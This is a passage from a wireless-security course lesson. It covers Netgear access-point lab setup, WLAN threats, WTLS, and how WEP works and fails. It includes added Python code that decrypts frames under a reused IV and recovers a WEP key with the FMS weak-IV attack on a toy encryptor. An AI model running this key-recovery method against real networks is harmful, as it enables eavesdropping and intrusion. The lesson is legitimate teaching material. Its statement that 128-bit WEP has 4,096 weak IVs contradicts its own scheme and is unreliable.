3. Click the Site Survey tab. You will now see the new AP that has recently
been configured.
4. Click the Profiles tab.
5. Click the New option. Type SCP-1 in the text box, and click OK.
6. Select the SCP-1 network, and click Connect.
7. Once you are connected in Infrastructure Mode, click the More Information
button to see the details of the connection.
Adding Infrastructure Network Clients
To make your network more functional, you will need other clients. You currently
have one AP and one Infrastructure client. In the following task, you will
configure the second wireless networking client.
TASK 9B-6
Configuring the Netgear Client
1. Log on to the computer with the Netgear WPN511 installed.
2. In the Windows system tray, click the Netgear WPN511 Smart Wizard
icon.
3. Click the Networks tab, and highlight the SCP-1 network by clicking on
it.
4. Click the Connect button. The adapter will now connect to the SCP-1
network.
5. To make the changes to the adapter's configuration, click the Apply button.
You are now connected in Infrastructure mode.
6. If you wish, open a command prompt and perform a ping test from one
computer to the other, and to the access point itself, to confirm the wireless
network is functional.
WLAN Threats
The threats facing the WLAN are similar to those facing the LAN, with some
variation due to the open medium of the wireless network. The techniques used
to counter the threats will be discussed later in this lesson. You will start with
some of the passive threats.
Eavesdropping and Analysis
One threat that is very prevalent in the WLAN is that of passive eavesdropping
and analysis. Passive eavesdropping is the easiest of all the threats to the WLAN.
A person with a laptop and a wireless network card in promiscuous mode can
simply sit outside of the physical boundary of your network and receive packets.
The attacker does not need to attempt to connect to the network at this time, only
listen.
By receiving packets, a skilled attacker can then analyze the network traffic. This
may lead to the attacker learning protocol information and operating system
information. Attackers can increase the range from which they can receive a
signal by using specialized antennas. These antennas can pull in signals from well
outside the range of the normal WLAN client. Attackers do not need to buy
expensive antennas for this; there are reports of people making successful
long-range antennas out of aluminum cans, washers, and pipes.
War Driving
Something that may not be a specific threat to the WLAN, but is in the same
category, is that of war driving. War driving is the practice of building a mobile
wireless machine, with software designed to learn and map wireless networks. In
addition, war drivers may have a powerful external antenna and a Global
Positioning System (GPS) device. Using a GPS, the attacker can record the exact
longitude and latitude of the network that was found while driving.
Along with war driving is a practice called war chalking. War chalking is where a
person who has found a WLAN via war driving marks the location with a
symbol. These symbols represent open networks, closed networks, protected
networks, and more. The growing list of symbols used to identify networks is
changing frequently.
Figure 9-21: Example of the three main symbols of war chalking.
In the figure, the symbol on the left indicates an open network, where the SSID is
being broadcast by the AP. When chalked, the symbol will include the actual
SSID located and the bandwidth at that point. The middle symbol is a closed
network, where the AP is not broadcasting the SSID. This symbol will also list the
SSID, once discovered, and the speed of the connection. The symbol on the right
is one that is protected using Wired Equivalent Privacy (WEP). WEP will be
discussed in more detail later in this lesson. The WEP symbol, along with the
others, may also contain other information; there is no restriction on what can be
written down. If you come into the office and see a symbol like this near your
network, you should address the security of the network right away.
Gaining Access
An interesting problem that is unique to the WLAN versus the wired network is
that of DHCP. If the WLAN is using DHCP, then any client that turns on in
range and asks for an IP address will be given one. This may include attacker
computers. In some instances, the entire job of the attacker gaining unauthorized
access is to simply find a WLAN, and there are many tools available to locate
WLANs.
Networks that use DHCP must employ another system to defend their wireless
network; otherwise any client may gain access. Even if there were operating
system level security measures in place to prevent unauthorized users from
accessing a server, they would be in the network. Furthermore, you could have
two or more users accessing the network and communicating with each other,
happily using up your wireless bandwidth.
The man-in-the-middle attack is one that exists on the wired network, and exists
in the wireless world as well. For this to work, the attacker is positioned between
two end points, which is trivial on the wireless network, as being between the
two points does not mean a straight line. The attacker breaks the connection that
is established between the target node and the AP. (The connection can be broken
using an RF jammer or other form of electrical interference.)
The attacker then configures the attacking machine as the new local AP for the
target, and allows the target to successfully associate with the attacker machine.
The attacker will then route the packets through to the legitimate AP. All packets
can then be stored and analyzed, and whatever purpose the attacker has in mind
can be carried out.
Denial of Service
One common threat for all forms of networking is the denial of service. For the
WLAN this can take on new meaning, as there are natural bandwidth restrictions
on the network to begin with. The WLAN has a limited amount of bandwidth to
share among all the WLAN clients. This is due to the physical restriction on the
number of radio waves available to carry data. Unlike the wired network, where
each node to the switch may have dedicated bandwidth, in the WLAN all nodes
share the same 10 MB, and this is amplified when you consider the devices are
half-duplex.
This is a perfect example of why two nodes connecting via DHCP can cause
problems on the network, even if they do not attempt to gain access to servers.
Simply performing large file transfers can tie up the network, as can setting up a
continuous ping sequence, or transmitting large malformed packets.
Topic 9C
Wireless Security Solutions
Although there are risks to using wireless networking, there are also solutions to
make the wireless network secure. It can be argued that the wireless network can
never be as secure as the wired network, but there are solutions that you can
implement to provide reasonable levels of security on your wireless networks. In
this topic you will examine and implement several of these solutions.
Wireless Transport Layer Security (WTLS)
As the WLAN grows and becomes more a part of our everyday life, and as
remote devices use WAP more, security of these networks is of obvious
importance. One tool available to the security professional is Wireless Transport
Layer Security (WTLS). WTLS has basic goals: to provide data integrity, privacy
for the two end points, and authentication between the two end points. The
WTLS stack is designed specifically for the low bandwidth and high latency
networks that are used for wireless communication.
WTLS Origins
WTLS is considered a security protocol for wireless networking, most specifically
applying to WAP, and is sponsored by the WAP Forum. WTLS is designed to
provide for the assurance that messages sent to and from end points in the wireless
network have not been modified. WTLS is based on TLS, which is based upon
SSL.
WTLS Authentication
When moving towards the security of a trusted network, authentication is a
requirement. WTLS is no different. The method of authentication used in WTLS
is certificates. It is possible to implement WTLS to not require certificates, but in
order to increase the security, certificates are recommended. Various formats of
certificates are allowed in WTLS, including the X.509v3 format.
WTLS Components
WTLS is split into multiple components. The lower layer is called the Record
Protocol (RP). The RP takes the raw data from the higher layers, performs
compression and encryption, and transmits the data. Likewise, upon receipt the RP
takes the data, performs decompression and decryption, and moves the data up to
the higher layers. The RP also performs message checking to verify the message
has not been altered. Once the RP has done its job, it will deliver the data to the
four higher-level clients of WTLS.
Figure 9-22: The components of WTLS.
There are four higher-level clients in the design of WTLS: handshake protocol,
alert protocol, application protocol, and change cipher specific protocol. Although
the extensive details of each of these are beyond the scope of this book, you
should be familiar with the function of each client.
WTLS Handshake Protocol
The WTLS handshake protocol client allows the two end points in the
communication to agree upon the security parameters of the communication. This
includes issues such as the protocol version used, cryptographic algorithms used,
and the handshake procedure.
Figure 9-23: The WTLS handshake process.
There are several steps to the handshake of WTLS. The first step is done from
the client; just as in SSL, the client initiates the communication by sending a
hello message, called ClientHello, to the server. The server responds with a
ServerHello message. Between these two hello messages, the client and server are
agreeing upon the session configuration. When the client sends the initial hello
message, the client will indicate the cryptographic algorithms that the client
supports, and the server hello message will include the algorithm chosen in the
response.
After the initial hello phase the server will send its certificate, called
ServerCertificate, and will request the client's certificate. At this time, the server
will also send the ServerKeyExchange, which is used to give the client the public
key, which will be used to exchange the pre-master secret value. The master
secret value will be the final piece used in the session. The server will then send
a ServerHelloDone message, indicating to the client to move on to the next step
in the handshake.
Upon receipt of the ServerHelloDone message, the client proceeds to send the
requested certificate and a ClientKeyExchange. The ClientKeyExchange contains
either the pre-master secret value (encrypted with the server's public key) or
other information to use in completing the key exchange. The client then sends
an optional ChangeCipherSpec message. Finally, the client will send a Finished
message to the server. The Finished message contains a verification of the agreed
upon information for the session.
The server will respond with a Finished message as well, verifying the security
and session parameters. The server will also send a ChangeCipherSpec message,
and the session will be established.
In the event that the session gets disrupted during communication, there is a
means to re-establish the session without a complete new handshake. During a
session, there is a SessionID assigned to the communication between the two end
points. If communication is cut, the client will send a ClientHello message, only
this time it will include the previous SessionID. The server responds with a
ServerHello, also with the SessionID. Upon matching the session, a
ChangeCipherSpec message will be sent, and then the session can be resumed
without the complete handshake.
WTLS Change Cipher Specific Protocol
The ChangeCipherSpec Protocol message can be sent by either the client or the
server. This message indicates a change in the cipher used for the communication.
The changing of the cipher can happen upon the re-establishment of a session,
but is most often part of the original handshake process.
WTLS Alert Protocol
The WTLS Alert Protocol is what manages error handling in the session. There
are three states of alert messages: warning, critical, and fatal. These messages are
sent in whatever state the session is currently in, encrypted, non-encrypted, and
so on. The warning message is a standard message warning of an existing
condition.
If a critical alert message is sent, then both ends ensure the secure communica-
tion is terminated. However, other connections are allowed to continue using the
secure session, and the existing SessionID may be used to establish a new secure
connection.
If a fatal alert message is sent, then both ends ensure the secure connection is
terminated. Other connections between the two ends using the same secure ses-
sion may continue, but the SessionID associated with the fatal alert is invalidated,
meaning the terminated connection cannot be used for new secure connections.
WTLS Application Protocol
In WTLS, the Application Protocol is simply a means for interfacing with the
upper layers. In the context of this course there are no security ramifications or
technical issues that network administrators and professionals will have to
configure.
Fundamental Access Point Security
On most modern access points there are a few things, outside of cryptography,
that you can do to increase the security of your wireless network. One is to
disable the SSID broadcast, removing the constant announcement that you have a
wireless network available. Another is to enable MAC address filtering, which
allows you to list the allowed and/or disallowed MAC addresses for your
network.
By disabling the SSID broadcast you are taking a simple step: you stop the AP
from constantly sending out frames telling the world that your wireless network is
here, this is the SSID, and please try to associate. It is better to keep that quiet.
Allow the end node to send a frame to the AP, and let the AP respond. An
attacker that is listening to the radio waves around your network will still likely
get this SSID information, but at least your APs are not specifically trying to
contact the attacker.
MAC address filtering is a bit more tedious, but provides a bit more control
and security over the network. The process of filtering is very direct: you create a
list of addresses, then define that list as allowed or disallowed. The common
implementation of the MAC address filter is to build the list of allowed addresses
and mark them as allowed. Your filter then defines all other addresses as
disallowed. This is not a solution to rely on as your main system, since MAC
addresses can be spoofed.
Neither SSID broadcast disabling nor MAC address filtering is enough protection
for you to consider your wireless network secure, but they are reasonable
layers you can add to your defense. The key to protecting your enterprise is to
create layer upon layer that work together to protect your resources, and these are
two small options that add layers.
Wired Equivalent Privacy (WEP)
When the 802.11 standard was created, those involved in the project were very
aware of the problems of wireless communications in regards to security. In the
wireless network, the word broadcast takes on a whole new meaning. WEP was
designed to provide levels of confidence in the security of the radio signals, as
they would be encrypted.
The initial response to WEP was positive, that WEP would ensure the security of
the wireless transmissions, and nearly all equipment vendors support WEP.
However, the one thing that is true regarding cryptography is that there is no
perfect system. Eventually flaws and modern technology will force the move to
new forms of cryptography. This usually takes some time, but for WEP the time
went by very quickly.
The general points regarding the implementation of WEP show some weakness
in the overall design. For example, WEP is not a security system that is turned on
by default. It is up to administrators and/or users to enable WEP, and then up to
those same people to properly configure it. Also, WEP utilizes a pre-shared key,
where both the AP and WNIC must be made aware of the key, or series of
available keys.
Cryptography and WEP
WEP uses a symmetric key system, where the secret key is shared between the
two end points, the AP and the WNIC. There is no standard system for
exchanging the secret key data, so the most common method is to simply manually
configure the two nodes with the correct key(s). To provide the encryption in
WEP, the RC4 cipher is used. This particular cipher is a symmetric stream cipher,
and follows all the standard uses of symmetric key cryptography.
RC4 is a well-known cipher, used in many secure systems such as SSL. The
problem in WEP is not the RC4 cipher, rather the implementation of the cipher.
Implementation is generally where the problems with encryption come into play,
and WEP is the prime example of this situation. Before moving into further detail
on WEP, you must examine stream ciphers.
Stream ciphers, as the name implies, stream the bits through the cryptosystem
one at a time. The raw data is then combined with the key stream in an
exclusive OR (XOR) operation to produce the cipher stream. The cipher stream is
then transmitted to the receiving node, where the process is repeated in reverse to
produce the raw data.
Figure 9-24: The standard operation of a stream cipher.
The stream cipher takes the short secret key and extends that into a larger value,
the same length as the message, just like a one-time pad. This extension is
created using a pseudorandom number generator (PRNG). To summarize, the
sender XORs the plaintext with the key stream to produce the cipher text, and the
receiver uses the identical key stream in reverse to produce the original plaintext.
Since the stream cipher works by reversing the equation on the receiving end, the
key is the critical component. The receiver will use the same key stream as the
sender, and simply XORs the ciphertext to arrive at the plaintext message. Since
the XORs cancel each other, if the plaintext = P, the ciphertext = C, and the key
stream = K, then the following equation holds:
P = C XOR K = P XOR K XOR K = P
Take the key stream, K, and two plaintext messages, P1 and P2, which go
through the process to become C1 and C2. If this is the case, C1 = P1 XOR K,
and C2 = P2 XOR K. Since K is the same, and the XOR process is well
known, you can assume then that the following equation is true:
C1 XOR C2 = P1 XOR K XOR P2 XOR K = P1 XOR P2
This means the attacker has now learned the XOR of two plaintext messages,
without any difficulty. This example highlights why a stream cipher such as this
should never encrypt two messages with the same K.
WEP and Key Lengths
The standard implementations of WEP utilize 64-bit shared RC4 keys. Many
people consider a 64-bit key to be weak, and those people have serious issues
with how WEP implements those 64 bits, and for good reason! Of the 64
available bits, 40 are assigned to the shared secret key value. This is where the
term 40-bit WEP comes from. In order to extend the life of WEP, several vendors
moved to offer 128-bit WEP, of which only 104 bits were used for the shared
secret key. If you are wondering where the extra bits that are not used for the
keys are going, they are going to what is called the Initialization Vector (IV).
In order to protect network transmissions from pure brute-force decryption
attacks, WEP is designed with the option of using a set of keys. Four keys can be
generated, and WEP can cycle through those four keys.
The WEP Process
As the RC4 cipher has been shown over time to be a solid cipher, the WEP
problem is found in the process, in the way that WEP attempts to protect data.
Understanding the process is critical in order to follow the steps of cracking
WEP, and making the realization that WEP provides little security.
For WEP to function, the two ends of the communication will have established
their secret key already. This is done by manually entering the single key that is
used, or by having a sequence of predefined keys to use. Many networks that
implement WEP use the single secret key option. Administrators of these
networks take some time to create a long and complex key, using the full
alphanumeric options.
Using the single key, and a strong one at that, is nice. However, as you will see,
there is actually not much added security by using such a strong single key. The
other option of having a series of keys to use provides for a slightly higher level
of security, as the single key is not reused for every single wireless transmission.
Here again however, you will see that the implementation of WEP is such that
the rolling key option does not provide much more security.
Figure 9-25: The WEP encryption process.
The process begins when the sender initiates the system for transmitting a
message. At this time, the plaintext is run through an integrity check algorithm to
create the Integrity Check Value (ICV). The 802.11 specifications define the use
of CRC-32 for this function. The ICV is then appended to the end of the original
plaintext message.
A 24-bit random (more on this in a moment) Initialization Vector (IV) number is
generated and added to the front of the secret key. (In this example the standard
40-bit secret key value is used.) The IV and secret key combo are input into the
Key Scheduling Algorithm (KSA).
The KSA is used to generate a seed value that will be used by the PRNG. The
following key sequence uses the value generated by the PRNG to create the key
stream that will match the length of the plaintext.
Once the key stream has been generated, it is XORed with the plaintext/ICV to
produce the encrypted portion of the message. The same IV that was input to the
KSA is prepended to the front of the encrypted message, a standard header and
FCS are added to the message, and it is transmitted.
Figure 9-26: The WEP decryption process.
Upon receipt of the message at the destination, the process is essentially done in
reverse. In order for the destination node to generate the symmetric key stream,
the variable IV must be used. This is the reason that the IV must be sent in
unencrypted form; the destination needs this value.
Using the shared secret key, the destination takes the IV and runs it through the
same KSA, PRNG, and key sequencing to get the key stream. The key stream
and the ciphertext are then XORed, and the resulting Plaintext and ICV are
calculated. Finally, the destination node computes a new ICV, and checks to see
if this new value matches the sent ICV. If there is a match, then the receiving
node will accept and process the message.
WEP Weakness
So, throughout this discussion, you may be wondering where the weakness is
found. Actually, there is more than one weakness, but the problems really start to
show when looking at the implementation of the IV.
The IV is a 24-bit field, regardless of the number of bits allocated to the secret
key. Therefore, when you implement 64-bit WEP, only 40 bits are for the key,
and 24 bits are for the IV. When you implement 128-bit WEP, only 104 bits are
for the key, and 24 bits are for the IV.
A 24-bit field does not yield very many possibilities, only 16,777,216 possible
combinations. This means that every 16.7 million times the IV is used it will
have no choice but to repeat itself. Busy networks will transmit that many
packets in a matter of hours at the most, and due to randomness it is likely that
values will be reused long before the 16 million mark.
But, in most networks the attacker will not have to wait for nearly 17 million
transmissions to find a duplicate IV. This is because many WNICs reset the IV to
0 when the card is reinitialized. As WNICs are reinitialized frequently in busy
networks, finding a repeating pattern may take a very short time.
If an attacker has any idea of the contents of the plaintext message, then the job
of breaking WEP is that much easier. This can be accomplished by the attacker
being the one to generate the plaintext message, such as by sending an email or
ping into the WEP-protected network, and sniffing the result. Knowing the
formatting of messages sent and received will also increase the attacker's success
rate. Given that message formatting is known, such as the first byte of plaintext
data being the SNAP header, this is not a difficult assumption. Once the attacker
has built up a table mapping known plaintext to the ciphertext, the key streams
can be stored.
An IV collision is when the IV is reused.
Figure 9-27: Example of the plaintext/ciphertext attack on WEP.
Earlier, you looked at some of the given equations of WEP. Recall that C1 = P1
XOR K and C2 = P2 XOR K; therefore, C1 XOR C2 = P1 XOR P2. Therefore,
sniffing both sides of the AP will give the attacker the keystream when the
attacker XORs the ciphertext with the plaintext. The attacker need not decrypt the
stream; only know what the stream is.
By doing this enough times, the attacker can build what is called a decryption
dictionary. The decryption dictionary is a table that the attacker has built that
stores all the keystreams, mapping the IV to the keystream. Due to the WEP
implementation, there are a maximum of 2^24 entries in the dictionary. Once the
dictionary is full, then the attacker can decrypt all WEP traffic. If the system is
fast enough, it may even happen in close to real-time.
If you recall that many systems reset their IV to 0 each time, this makes for a
much smaller keyspace used. Another problem is that systems are not required to
change the IV on each packet, again making smaller and smaller spaces that
require attacking.
Take a look at the following equation, to see how this works out in simple binary.
In this case, you are looking at just two bytes, but the process is identical for
larger amounts of data. Assume for this equation, you are the attacker.
0110100001101001 Known plaintext. (Known because you sent it.) This is P1.
0110100111000101 Known ciphertext. (Known because you are sniffing it.) This is C1.
1010001110101100 Learned stream. (Learned by XORing the plaintext with the ciphertext.) This is now K.
When emailing the target,
sending a message of a
string of the same character
(such as all 5s) makes
comparison between
plaintext and ciphertext a bit
simpler.
The attacker can simply perform this type of operation over and over, until all the
keystreams are identied. After the keystream is known, the attacker can take any
WEP message, look up the known data in the dictionary, and XOR the ciphertext
to get the plaintext. The attacker did not spend time trying to decrypt the key. In
this case, the attacker does not care what the key is, only the value of the key
stream.
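The WEP encryption and decryption process described above, together with the stream-cipher equations and the decryption dictionary built from an IV collision, as an added Python example (not code from the course). RC4 is implemented here in its standard form so the block runs offline; the 40-bit secret key, the IVs and the frames are all constructed, and the ICV byte order is a choice made for this example.

```python
"""WEP encryption, decryption, and what one reused IV leaks, worked in code.

Added example, not the course's code. RC4 is the standard algorithm; the
secret key, IVs and frame payloads below are constructed for the demonstration.
"""
import zlib


def rc4_keystream(key: bytes, length: int) -> bytes:
    """KSA followed by the PRNG stage: expand `key` into `length` keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):                          # key scheduling algorithm (KSA)
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:                      # pseudorandom generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(plaintext: bytes) -> bytes:
    """CRC-32 Integrity Check Value; little-endian byte order is this example's choice."""
    return zlib.crc32(plaintext).to_bytes(4, "little")


def wep_encrypt(secret: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Return IV || RC4(IV || secret) XOR (plaintext || ICV), as the text describes."""
    body = plaintext + icv(plaintext)
    keystream = rc4_keystream(iv + secret, len(body))   # 24-bit IV prepended to the key
    return iv + xor(body, keystream)


def wep_decrypt(secret: bytes, frame: bytes) -> bytes:
    """Reverse the process; raise ValueError if the recomputed ICV does not match."""
    iv, ciphertext = frame[:3], frame[3:]
    body = xor(ciphertext, rc4_keystream(iv + secret, len(ciphertext)))
    plaintext, sent_icv = body[:-4], body[-4:]
    if icv(plaintext) != sent_icv:
        raise ValueError("ICV mismatch: frame altered or wrong key")
    return plaintext


# --- What an eavesdropper learns when the same IV is used twice -----------------

def keystream_from_known_plaintext(frame: bytes, known_plaintext: bytes) -> bytes:
    """C1 XOR P1 = K. The ICV is computable from P1, so the attacker learns
    len(P1) + 4 keystream bytes for this IV without ever touching the secret key."""
    known_body = known_plaintext + icv(known_plaintext)
    return xor(frame[3:], known_body)


def plaintext_xor(frame1: bytes, frame2: bytes) -> bytes:
    """C1 XOR C2 = P1 XOR P2 whenever both frames share an IV (and the secret)."""
    if frame1[:3] != frame2[:3]:
        raise ValueError("only meaningful for an IV collision")
    return xor(frame1[3:], frame2[3:])


def demo() -> dict:
    secret = bytes.fromhex("0123456789")          # constructed 40-bit shared key
    iv = b"\x00\x00\x00"                           # a card that resets its IV to 0
    p1 = b"\xaa\xaa\x03" + b"ping"                 # SNAP header bytes, then a known payload
    p2 = b"\xaa\xaa\x03" + b"data"                 # a second frame the attacker did not send
    c1 = wep_encrypt(secret, iv, p1)
    c2 = wep_encrypt(secret, iv, p2)               # IV collision: same IV, same secret
    assert wep_decrypt(secret, c1) == p1
    # Decryption dictionary: IV -> keystream, filled from one known-plaintext frame.
    dictionary = {iv: keystream_from_known_plaintext(c1, p1)}
    recovered = xor(c2[3:], dictionary[c2[:3]])[:len(p2)]
    return {
        "xor_leak": plaintext_xor(c1, c2)[:len(p2)] == xor(p1, p2),
        "recovered_p2": recovered,                 # p2 read without knowing the secret
    }


if __name__ == "__main__":
    print(demo())
```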
The final big push that led to the downfall of WEP as the primary security sys-
tem for wireless communications came in August of 2001. A paper was published
by Scott Fluhrer, Itsik Mantin, and Adi Shamir titled "Weaknesses in the Key
Scheduling Algorithm of RC4." This paper included theoretical attacks on WEP
that were implemented within weeks.
One of the focus points in the paper was that of weak IVs: certain IVs make the
first output byte of RC4 depend on a single secret key byte with a noticeable
probability (roughly 5 percent, against 1 in 256 for a random guess). Because
802.11 data frames carry an LLC/SNAP header, the first plaintext byte of almost
every frame is known to be 0xAA (the SNAP DSAP value). Knowing the plaintext
value of the first byte, an attacker can simply XOR the first byte of the ciphertext
with 0xAA to reveal the first byte of the keystream for that IV, which is exactly
the byte the weak-IV attack needs.
In the paper, this class of weak keys is analyzed. Each weak IV is used to attack
one specific byte of the secret part of the RC4 key. The bytes of the key are
numbered starting from zero, with the three IV bytes occupying positions 0
through 2 and the secret key following them, and a weak IV of the form
(B+3, 255, X) attacks secret key byte B. In a 40-bit WEP implementation (five
secret key bytes) there are 1,280 such weak IVs. You should be aware that the
number of weak IVs varies with the key length.
Therefore, if you elect to use 128-bit WEP, the overall number of weak IVs
increases. The 128-bit WEP implementation (which uses 104 bits, or 13 bytes, for
the key) has more than three times as many weak IVs as 40-bit WEP: 4,096 rather
than 1,280. A longer key does not make the attack harder, it only means more
bytes to recover, one at a time.
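Both attacks above, simulated end to end against a toy WEP encryptor. This is an added example written for this page, not code from the course or from any WEP-cracking tool; the 40-bit key, the frames and the packet capture are all constructed. The first attack recovers a keystream from a known plaintext and uses it to decrypt a second frame sent under the same IV, without ever learning the key. The second runs the FMS weak-IV vote over the 1,280 IVs of the form (B+3, 255, X) for a five-byte key, using the SNAP byte 0xAA as the known plaintext. The ICV and the rest of the 802.11 framing are left out.

```python
"""WEP keystream reuse and FMS weak-IV key recovery against a toy WEP.

Added example; the key, the frames and the packet capture are constructed.
"""
from collections import Counter

SECRET_KEY = bytes([0x1A, 0x2B, 0x3C, 0x4D, 0x5E])   # constructed 40-bit WEP key
SNAP_DSAP = 0xAA          # first plaintext byte of every LLC/SNAP-encapsulated frame


def rc4_ksa(key: bytes, steps: int = 256):
    """RC4 key scheduling; returns (S, j) after the first `steps` iterations."""
    S = list(range(256))
    j = 0
    for i in range(steps):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S, j


def rc4_keystream(key: bytes, n: int) -> bytes:
    """First n bytes of the RC4 keystream for `key`."""
    S, _ = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(iv: bytes, plaintext: bytes, key: bytes = SECRET_KEY) -> bytes:
    """Toy WEP: the per-packet RC4 key is IV || secret key; the ICV is omitted."""
    return iv + xor(plaintext, rc4_keystream(iv + key, len(plaintext)))


# --- attack 1: the keystream dictionary ------------------------------------
def recover_keystream(known_plaintext: bytes, frame: bytes) -> bytes:
    """Keystream for the frame's IV = known plaintext XOR ciphertext body."""
    return xor(known_plaintext, frame[3:])


def decrypt_with_keystream(keystream: bytes, frame: bytes) -> bytes:
    """Decrypt any frame sent under the same IV, without ever learning the key."""
    return xor(keystream, frame[3:])


# --- attack 2: FMS weak IVs -------------------------------------------------
def fms_votes(b: int, known_secret: bytes, packets) -> Counter:
    """Vote for secret key byte b given secret bytes 0..b-1 (packets: (iv, c0))."""
    votes = Counter()
    for iv, c0 in packets:
        # the attacker knows RC4 key bytes 0..b+2: the IV plus the bytes recovered so far
        S, j = rc4_ksa(iv + known_secret, steps=b + 3)
        if S[1] < b + 3 and (S[1] + S[S[1]]) & 0xFF == b + 3:   # a "resolved" IV
            z = c0 ^ SNAP_DSAP                       # first keystream byte, from 0xAA
            votes[(z - j - S[b + 3]) & 0xFF] += 1    # right with probability ~5%
    return votes


def weak_iv_capture(key: bytes = SECRET_KEY):
    """One frame per weak IV (B+3, 0xFF, X): 256 per secret byte, 1,280 here."""
    llc_snap = bytes([SNAP_DSAP, 0xAA, 0x03])   # start of the LLC/SNAP header
    capture = []
    for b in range(len(key)):
        for x in range(256):
            iv = bytes([b + 3, 0xFF, x])
            capture.append((iv, wep_encrypt(iv, llc_snap, key)[3]))
    return capture


def recover_key(packets, key_len: int = len(SECRET_KEY)) -> bytes:
    """Recover the secret byte by byte; each byte's vote depends on the last."""
    secret = b""
    for b in range(key_len):
        secret += bytes([fms_votes(b, secret, packets).most_common(1)[0][0]])
    return secret


if __name__ == "__main__":
    iv = bytes([0x01, 0x02, 0x03])
    f1 = wep_encrypt(iv, b"hello world")     # the attacker sent this, so knows it
    f2 = wep_encrypt(iv, b"secret data")     # sniffed later, under the same IV
    ks = recover_keystream(b"hello world", f1)
    print("decrypted under reused IV:", decrypt_with_keystream(ks, f2))
    cap = weak_iv_capture()
    print("votes for key byte 0:", fms_votes(0, b"", cap).most_common(3))
    print("recovered key:", recover_key(cap).hex(), "true:", SECRET_KEY.hex())
```

With only 256 weak IVs per key byte the correct value gets about 13 votes while the noise candidates get one or two, so the vote usually, but not always, picks the right byte; real tools collect many more frames and also use the additional weak-IV classes found after the FMS paper, which is why a busy network falls in minutes.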
WEP Conclusion
Although by now you may feel that there is no practical value in utilizing WEP,
you should still take advantage of this option. Adding this layer of security
should be one of the starting points in the security of your wireless network, not
the end. By having WEP on the network, you may be able to remove the casual
attacker from any interest in your network.
Configure WEP
Up to this point, you have seen the creation of an ad-hoc wireless network, and
the creation of an infrastructure network. Although effective for fast setup and
simple congurations, this provides no security. The only time you should run an
unprotected network is in a controlled lab environment, where access to any pro-
duction machine of any type is impossible.
In this section, you will see the process of enabling WEP. Even though you've
learned that WEP can be cracked, if your wireless system does not support any
more robust security features, you must implement WEP as your bare minimum.
In this task, 128-bit WEP will be configured. The AP that will be configured to
use WEP is a Netgear WPN824.
Lesson 9: Securing Wireless Networks 501
TASK 9C-1
Installing the Netgear WPN824 Access Point
1. Log on to your Windows 2003 Server as Administrator.
2. Open the Network Properties of your LAN adapter.
3. Select TCP/IP, and click Properties.
Configure your LAN IP Address to allow you access to the Internet,
click OK twice, and then click Close.
Note: In these tasks, the Netgear AP will reconfigure the Server to use DHCP by default to connect to the AP.
5. Insert the Netgear CD-ROM in the CD-ROM drive. If the setup program
does not autorun, navigate to the CD, and double-click the Autorun.exe le.
6. From the main menu, click Setup.
7. Read the Before You Begin instructions, and click Next.
8. Record your current network settings, as shown, and click Next. The
system will recongure to use DHCP as required.
9. Once the system has conrmed your setup and Internet connection, click
Yes.
10. In the Overview screen, click Next.
11. Review the screen to turn off the broadband modem, and click Next.
12. Review the disconnection of the Ethernet cable screen, and click Next.
13. Connect the Netgear Router to the Broadband connection, and click
Next.
14. Connect your Server to the Netgear Router, then click Next.
15. Power on the Broadband device, then power on the router, and click
Next.
16. Wait while the system resets, and when you are at the Welcome screen click
the Advanced User URL that is shown in the window.
17. For User Name, type admin and for the Password, type password (these are
the defaults), and click OK.
18. If you receive a rmware update notice, check the Do Not Display Again
check box, and click Close Window. If you do not receive a rmware
update notice, move to the next step.
Type an IP Address of 10.0.10.50, a Subnet Mask of 255.255.255.0, and a
Gateway IP Address of 10.0.10.2.
Configure the DNS Settings for your network. Then, click Apply. If you
are prompted for the user name and password, use the same credentials you
used earlier in step 17.
20. From the menu on the left side of the screen, click the Wireless Settings
link.
21. In the Name (SSID) text box type SCP-2
Leave the Channel and Mode at their defaults.
22. Under Security Options, select the WEP radio button. The WEP options
will be enabled when you make this selection.
23. Keep the default Authentication Type as Automatic, and in the Encryption
Strength drop-down list, select 128bit.
Select the Key 1 radio button, and in the Passphrase text box type
SECRET1 and click the Generate button. (Note: the system is designed
to populate only one Key field at a time, but at times it will populate
all of the fields. If this is the case, copy and paste each key to Notepad.)
25. Select the Key 2 radio button, and in the Passphrase text box type
SECRET2 and click the Generate button. Repeat this pattern for Keys 3
and 4.
26. Once all four keys are entered, click Apply.
27. Enter the Netgear credentials, and click OK. The settings will be updated.
Establishing the WEP Network
With the Access Point installed and congured to use WEP, you will now need to
congure the clients to use the same security settings. Since the AP is congured
to use four different WEP keys, these exact same keys will be required on each
WEP client. The client to be congured will be the Netgear Client.
The WEP clients and APs use the same keys. You will use the following
keyphrases and keys:
SECRET1 - D26BC1D2A0BFE7F09BBF02349C
SECRET2 - 30FC02118708A87A1A2CB06E1B
SECRET3 - 014DAAF8F9BEECA7E046D7C2AC
SECRET4 - F41FB818ED33EDD64D38E62BA0
TASK 9C-2
Configuring WEP on the Network Client
1. Log on to the computer that has the Netgear WPN511 installed.
2. In the Windows system tray, click the Netgear WPN511 Smart Wizard
icon.
3. Click the Networks tab.
4. Click the Scan button to locate the new network. Note that the new WEP
network is located.
5. Select the SCP-2 network, and click the Connect button. Note that you
are brought to the main Settings tab when you do this, and that both the
SSID and WEP options have been selected.
6. In the Passphrase drop-down list, select 128 bits.
Verify that Key 1 is highlighted under the Enter Key Manually drop-down
list, and in the Passphrase text box type SECRET1 (notice that the Key is
automatically generated.)
8. Select Key 2 in the drop-down list, and type SECRET2 in the
Passphrase text box.
9. Select Key 3 in the drop-down list, and type SECRET3 in the
Passphrase text box.
